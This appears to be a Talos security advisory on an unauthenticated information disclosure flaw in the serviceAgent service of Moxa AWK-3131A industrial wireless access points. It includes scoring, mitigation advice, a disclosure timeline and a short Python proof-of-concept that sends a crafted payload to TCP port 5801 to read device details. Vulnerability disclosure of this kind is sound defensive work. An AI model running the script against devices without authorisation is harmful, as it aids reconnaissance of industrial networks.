Lucene search

Talos IntelligenceTALOS-2016-0238

HistoryApr 10, 2017 - 12:00 a.m.

Moxa AWK-3131A serviceAgent Information Disclosure Vulnerability

2017-04-1000:00:00

Talos Intelligence

www.talosintelligence.com

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

EPSS

0.001

Percentile

47.7%

JSON

Summary

An exploitable information disclosure vulnerability exists in the serviceAgent functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted TCP query will allow an attacker to retrieve potentially sensitive information.

Tested Versions

Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1

Product URLs

<http://www.moxa.com/product/AWK-3131A.htm>

CVSSv3 Score

5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Details

An exploitable information disclosure vulnerability exists in the serviceAgent functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted TCP query will allow an attacker to retrieve potentially sensitive information, such as firmware version.

The functionality exposed by serviceAgent is accessible by using a freely-available Windows application (Moxa Windows Search Utility) or with custom scripts. In addition, the service does not use authentication and the protocol communicates in cleartext.

Exploit Proof-of-Concept

The below Python script, using a payload pulled from traffic generated by the Moxa Windows Search Utility application, will retrieve information from a target device that may be of value to an attacker .

#!/usr/bin/python

import socket

host = '&lt;device IP&gt;'
port = 5801

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))
s.send(
"\x00\x01\x00\x01\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x0c\x29\xd3\xe0\x26\x00\x90\xe8\x57\x23\x07" +
"\x00\x00\x00\x05\x00\x02\x00\x06\x00\x18\x00\x00\x00\x00")

print s.recv(1024)

s.close()

Mitigation

It does not appear possible to disable serviceAgent using legitimately accessible functionality. In addition, the service does not require authentication and transmits information in cleartext. Blocking this service from communicating across network boundaries will mitigate some of the risk associated with this vulnerability.

Timeline

2016-11-18 - Vendor Disclosure
2017-04-10 - Public Release

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

EPSS

0.001

Percentile

47.7%

JSON

Related for TALOS-2016-0238